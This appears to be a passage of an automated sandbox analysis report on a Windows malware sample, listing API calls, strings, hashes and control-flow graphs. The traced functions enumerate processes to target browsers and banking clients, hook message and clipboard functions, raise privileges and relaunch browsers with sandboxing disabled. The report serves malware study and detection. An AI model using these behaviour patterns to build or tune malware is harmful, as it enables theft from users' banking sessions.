                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303480,00000000,00000000,00000000), ref: 012F74A7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F74BB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F74C8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013043F0,00000000,00000000,00000000), ref: 012F74DD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F74F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F74FE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013047D0,00000000,00000000,00000000), ref: 012F7513
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7527
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7534
                                                                                                                                                                                                                • Part of subcall function 012F5720: memset.MSVCRT(?,00000000,00000103,774CF550,775B7390,774D0A60), ref: 012F5741
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,774CF550,775B7390,774D0A60), ref: 012F5757
                                                                                                                                                                                                                • Part of subcall function 012F5720: AddVectoredExceptionHandler.KERNEL32(00000001,012E3A20), ref: 012F5764
                                                                                                                                                                                                                • Part of subcall function 012F5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 012F577F
                                                                                                                                                                                                                • Part of subcall function 012F5720: CreateThread.KERNEL32(00000000,00000000,012FA7B0,00000000,00000000,00000000), ref: 012F5799
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetHandleInformation.KERNEL32(00000000,?), ref: 012F57B1
                                                                                                                                                                                                                • Part of subcall function 012F5720: CloseHandle.KERNEL32(00000000), ref: 012F57C2
                                                                                                                                                                                                                • Part of subcall function 012F5720: InitializeCriticalSection.KERNEL32(0132FB50), ref: 012F57D3
                                                                                                                                                                                                                • Part of subcall function 012F5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 012F57E9
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 012F57FB
                                                                                                                                                                                                                • Part of subcall function 012F5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 012F581A
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 012F5828
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,GetMessageA,00000000,012F42A0,0133A00C), ref: 012F5844
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,GetMessageW,00000000,012F43D0,0133A010), ref: 012F5860
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013019A0,00000000,00000000,00000000), ref: 012F7549
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F755D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F756A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01301C80,00000000,00000000,00000000), ref: 012F757F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7593
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F75A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012E80C0,00000000,00000000,00000000), ref: 012F75B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F75CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F75E6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 012F75FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 012F7613
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 012F7625
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 012F7637
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 012F7649
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\core.exe), ref: 012F765B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 012F766D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 012F767F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012F76EC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012F76FB
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 012F7714
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 012F771B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012F7731
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012EBC50,00000000,00000000,00000000), ref: 012F7745
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F775D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F776E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012E7FD0,00000000,00000000,00000000), ref: 012F7783
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F779B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F77AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcess$CriticalCurrentFreeInitializeModuleMutexPathSection$#680BackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemUserValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                              • String ID: --no-sandbox$ --no-sandbox$9E2B3C2Da$9E2B3F61a$9e2b3b2da$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1305306284-755258072
                                                                                                                                                                                                              • Opcode ID: 137952eced9fcc4525db3b64bd79c1c843950e4ac7a2b61d84ce34e1bfe7db0f
                                                                                                                                                                                                              • Instruction ID: abc69a3048a9e7a4e561da19a386b1cfaf70af4da91d71dc97df09a139e9b117
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 137952eced9fcc4525db3b64bd79c1c843950e4ac7a2b61d84ce34e1bfe7db0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6629C31A6131AB6FB31ABA98D06FDEBAAC9F04F45F50415CFB04B61C4DBB0D6058764
                                                                                                                                                                                                              Function 012F79D0 Relevance: 40.8, APIs: 27, Instructions: 286memorytimesleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 294 12f79d0-12f79df 295 12f79e1-12f79ec call 12f78a0 294->295 298 12f7db3-12f7dbb Sleep 295->298 299 12f79f2-12f79fa 295->299 298->295 300 12f7ae6 299->300 301 12f7a00-12f7a3e OpenProcess 299->301 302 12f7aea-12f7b35 OpenProcess 300->302 303 12f7a9a-12f7aa9 EnterCriticalSection 301->303 304 12f7a40-12f7a60 GetProcessTimes 301->304 306 12f7b88-12f7b99 EnterCriticalSection 302->306 307 12f7b37-12f7b54 GetProcessTimes 302->307 305 12f7ab0-12f7ab7 303->305 308 12f7a62-12f7a6e 304->308 309 12f7a70-12f7a74 304->309 313 12f7ab9-12f7abd 305->313 314 12f7ad8 305->314 315 12f7b9b 306->315 316 12f7bb3-12f7c63 LeaveCriticalSection VirtualQuery * 2 306->316 310 12f7b56-12f7b60 307->310 311 12f7b62 307->311 312 12f7a78-12f7a8a GetHandleInformation 308->312 309->312 317 12f7b66-12f7b78 GetHandleInformation 310->317 311->317 312->303 318 12f7a8c-12f7a91 312->318 313->305 319 12f7abf-12f7ad6 LeaveCriticalSection call 12f7810 313->319 322 12f7ada-12f7adc 314->322 320 12f7ba0-12f7ba7 315->320 321 12f7c65-12f7c7c call 1304cc0 316->321 317->306 323 12f7b7a-12f7b7f 317->323 318->303 324 12f7a93-12f7a94 CloseHandle 318->324 319->322 326 12f7d6f-12f7d7b 320->326 327 12f7bad-12f7bb1 320->327 335 12f7c7e-12f7c82 321->335 336 12f7c84-12f7cab EnterCriticalSection GetProcessHeap HeapAlloc 321->336 322->301 329 12f7ae2 322->329 323->306 330 12f7b81-12f7b82 CloseHandle 323->330 324->303 326->302 332 12f7d81 326->332 327->316 327->320 329->300 330->306 334 12f7d85-12f7d89 332->334 334->298 337 12f7d8b-12f7d9e GetProcessHeap HeapValidate 334->337 335->321 335->336 338 12f7d64-12f7d69 LeaveCriticalSection 336->338 339 12f7cb1-12f7cf8 OpenProcess 336->339 342 12f7daf-12f7db1 337->342 343 12f7da0-12f7da9 GetProcessHeap HeapFree 337->343 338->326 340 12f7d4f-12f7d5e 339->340 341 12f7cfa-12f7d17 GetProcessTimes 339->341 340->338 344 12f7d19-12f7d23 341->344 345 12f7d25 341->345 342->298 342->334 343->342 346 12f7d29-12f7d3f GetHandleInformation 344->346 345->346 346->340 347 12f7d41-12f7d46 346->347 347->340 348 12f7d48-12f7d49 CloseHandle 347->348 348->340
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012F78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 012F78B4
                                                                                                                                                                                                                • Part of subcall function 012F78A0: Process32First.KERNEL32(00000000,?,?,00000000), ref: 012F78D9
                                                                                                                                                                                                                • Part of subcall function 012F78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 012F78FD
                                                                                                                                                                                                                • Part of subcall function 012F78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 012F7917
                                                                                                                                                                                                                • Part of subcall function 012F78A0: EnterCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F793B
                                                                                                                                                                                                                • Part of subcall function 012F78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 012F7941
                                                                                                                                                                                                                • Part of subcall function 012F78A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 012F7948
                                                                                                                                                                                                                • Part of subcall function 012F78A0: LeaveCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F7977
                                                                                                                                                                                                                • Part of subcall function 012F78A0: Process32Next.KERNEL32(00000000,00000128,?,00000000), ref: 012F798B
                                                                                                                                                                                                                • Part of subcall function 012F78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 012F79A5
                                                                                                                                                                                                                • Part of subcall function 012F78A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 012F79B6
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 012F7A34
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 012F7A58
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F7A82
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7A94
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80), ref: 012F7A9F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7AC4
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 012F7B2B
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 012F7B4C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F7B70
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7B82
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80), ref: 012F7B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7BB8
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012F7C06
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012F7C51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80,?,?), ref: 012F7C90
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 012F7C9A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F7CA1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 012F7DB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$AllocOpenProcess32QueryTimesVirtual$CreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 87146162-0
                                                                                                                                                                                                              • Opcode ID: e1db2a0ef439dfa01625ce68a9c49ad8638b09057ca12f1777a9758e45b9c4ad
                                                                                                                                                                                                              • Instruction ID: 28bb36c9bb40e487f1c3bd2df85b878010a568dab559314f7fe0f0410f30d4a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1db2a0ef439dfa01625ce68a9c49ad8638b09057ca12f1777a9758e45b9c4ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7C106B16183519FD321DF69C884AABFBE8FB88B10F54892EF689C7245D7709504CF92
                                                                                                                                                                                                              Function 012F4F80 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsNetworkAlive.SENSAPI(012E6E0D,00000000), ref: 012F4F93
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F4FA1
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 012F4FAB
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012F4FC8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,774D0F10), ref: 012F4FE7
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 012F5000
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5013
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,774D0F10), ref: 012F502C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,774D0F10), ref: 012F5045
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 012F5058
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5065
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CheckConnectionInternetlstrcpynmemset$#680AliveCacheFlushNetworkResolver
                                                                                                                                                                                                              • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                              • API String ID: 1332333999-3977723178
                                                                                                                                                                                                              • Opcode ID: 256886b64453d0d708f727780ffe95912f5b9c682aa8ca4c6c73ea9dcb3cfe99
                                                                                                                                                                                                              • Instruction ID: 33f3ae1c9f5d25dbf777ee7442e2c30d211af9a038ec0b3f962d051257f83b14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 256886b64453d0d708f727780ffe95912f5b9c682aa8ca4c6c73ea9dcb3cfe99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48219B72A4432967D730EBA9AC41FDAB76C9B54B15F004199F788E61C0DAF196C48BE0
                                                                                                                                                                                                              Function 012F78A0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 012F78B4
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?,?,00000000), ref: 012F78D9
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000), ref: 012F78FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 012F7917
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F793B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 012F7941
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 012F7948
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F7977
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcess.KERNEL32(00000400,00000000,00000000,774CF550,00000000,7765C3F0), ref: 01304895
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048AC
                                                                                                                                                                                                                • Part of subcall function 01304880: GetTokenInformation.ADVAPI32(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 013048CA
                                                                                                                                                                                                                • Part of subcall function 01304880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048E2
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(?,00000000), ref: 0130493B
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(?), ref: 0130494C
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(00000000,?), ref: 0130495E
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(00000000), ref: 0130496F
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128,?,00000000), ref: 012F798B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 012F79A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 012F79B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 012F7912
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                              • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                              • API String ID: 3461290786-4199822264
                                                                                                                                                                                                              • Opcode ID: 25954a1f655cd0e8af8b30ed72c4d1fe4de0860055fe6654a06d0d08b9281f2f
                                                                                                                                                                                                              • Instruction ID: 87ea6d87633cb3c682979c7643b7538ca398b0e41457a64dad47aec3b04752ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25954a1f655cd0e8af8b30ed72c4d1fe4de0860055fe6654a06d0d08b9281f2f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66315E719112169BEB30AF69D848BEEBBBCEF49754F1440ADEA44D3240D7709B41CBA0
                                                                                                                                                                                                              Function 01305930 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: a2ff8a82daf51185cc6e9b43bf447cd53ffc59a53b87dc87568bd52258f99671
                                                                                                                                                                                                              • Instruction ID: 831aa1c3c8a0b3f29cc33722a0901ba06aba005d4dab01594f3f2ca93b7a0115
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2ff8a82daf51185cc6e9b43bf447cd53ffc59a53b87dc87568bd52258f99671
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C113C75641214ABFB30EFA49D1DFAA7BBCEB05B15F108448FA01E6185D6B4AA04CBA1
                                                                                                                                                                                                              Function 01281360 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction ID: cffe4e9143a532234694e9da3e4d2dcc1baff380730f40fa0903802ed7fa364f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E916171E12216AFDB10EFA8CC40BAEB7B5BF98350F254559E904A73C4D734A912CBA4
                                                                                                                                                                                                              Function 012F7DD0 Relevance: 49.2, APIs: 24, Strings: 4, Instructions: 244registrymemorysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
